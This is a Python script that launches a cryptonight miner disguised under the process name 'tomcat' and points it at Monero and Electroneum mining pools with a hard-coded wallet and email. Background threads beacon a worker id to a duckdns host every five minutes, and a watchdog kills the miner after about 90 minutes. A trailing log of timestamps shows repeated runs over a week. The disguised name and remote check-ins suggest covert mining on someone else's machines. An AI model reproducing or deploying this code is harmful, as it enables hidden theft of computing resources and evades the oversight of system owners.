import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:06.441273
#2018-02-17 16:05:01.360692
#2018-02-17 17:52:04.401909
#2018-02-17 19:39:05.066717
#2018-02-17 21:28:04.007403
#2018-02-17 23:12:04.748288
#2018-02-18 00:59:04.479399
#2018-02-18 02:47:02.152634
#2018-02-18 04:36:07.240785
#2018-02-18 06:27:05.513249
#2018-02-18 08:15:09.705057
#2018-02-18 10:03:06.236247
#2018-02-18 11:49:03.535264
#2018-02-18 13:34:06.073583
#2018-02-18 15:24:07.609069
#2018-02-18 17:14:06.276969
#2018-02-18 19:03:06.036333
#2018-02-18 20:50:04.666363
#2018-02-18 22:35:06.583796
#2018-02-19 00:23:03.705392
#2018-02-19 02:09:06.637597
#2018-02-19 03:56:05.942505
#2018-02-19 05:40:07.671541
#2018-02-19 07:28:06.306490
#2018-02-19 09:18:06.377951
#2018-02-19 11:07:05.192204
#2018-02-19 12:53:09.386237
#2018-02-19 14:41:06.212257
#2018-02-19 16:29:04.407697
#2018-02-19 18:15:10.318415
#2018-02-19 20:03:08.266305
#2018-02-19 21:53:03.994629
#2018-02-19 23:39:03.511651
#2018-02-20 01:26:03.771430
#2018-02-20 03:14:08.139216
#2018-02-20 05:02:02.133486
#2018-02-20 06:44:07.898042
#2018-02-20 08:29:06.229215
#2018-02-20 10:14:05.896636
#2018-02-20 11:58:08.947209
#2018-02-20 13:47:04.820320
#2018-02-20 15:30:13.086428
#2018-02-20 17:15:07.921271
#2018-02-20 19:04:11.890765
#2018-02-20 20:53:05.973683
#2018-02-20 22:37:01.828309
#2018-02-21 00:18:06.111438
#2018-02-21 02:04:03.452807
#2018-02-21 03:51:01.419505
#2018-02-21 05:36:06.697401
#2018-02-21 07:24:01.755526
#2018-02-21 09:09:04.294853
#2018-02-21 10:58:07.478556
#2018-02-21 12:44:06.168715
#2018-02-21 14:34:01.847660
#2018-02-21 16:21:08.800577
#2018-02-21 18:14:01.362576
#2018-02-21 19:59:01.348992
#2018-02-21 21:46:07.922687
#2018-02-21 23:42:07.436786
#2018-02-22 01:32:06.374785
#2018-02-22 03:20:03.926176
#2018-02-22 05:07:06.513120
#2018-02-22 06:51:01.456690
#2018-02-22 08:39:01.419483
#2018-02-22 10:25:06.189782
#2018-02-22 12:11:10.531674
#2018-02-22 13:58:07.344893
#2018-02-22 15:46:05.162499
#2018-02-22 17:32:05.989793
#2018-02-22 19:18:04.811660
#2018-02-22 21:09:06.158955
#2018-02-22 22:54:04.607019
#2018-02-23 00:42:07.288155
#2018-02-23 02:29:01.881191
#2018-02-23 04:18:06.380364
#2018-02-23 06:04:07.627392
#2018-02-23 07:51:01.481057
#2018-02-23 09:53:01.806163
#2018-02-23 11:57:01.913189
#2018-02-23 13:45:04.158959
#2018-02-23 15:34:09.384743
#2018-02-23 17:22:01.463850
#2018-02-23 19:07:04.837533
#2018-02-23 20:53:04.303032
#2018-02-23 22:38:07.606927
#2018-02-24 00:24:02.027116
#2018-02-24 02:16:01.244730
#2018-02-24 04:05:03.588912
#2018-02-24 05:50:02.254747
#2018-02-24 07:40:05.283652
#2018-02-24 09:25:07.579020
#2018-02-24 11:19:06.533829
#2018-02-24 13:08:04.303294
#2018-02-24 14:58:04.341050
#2018-02-24 16:48:07.045081
#2018-02-24 18:36:04.433636
#2018-02-24 20:23:05.953299
#2018-02-24 22:18:06.878987
#2018-02-25 01:26:05.669801
#2018-02-25 05:24:06.371493
#2018-02-25 11:34:05.738297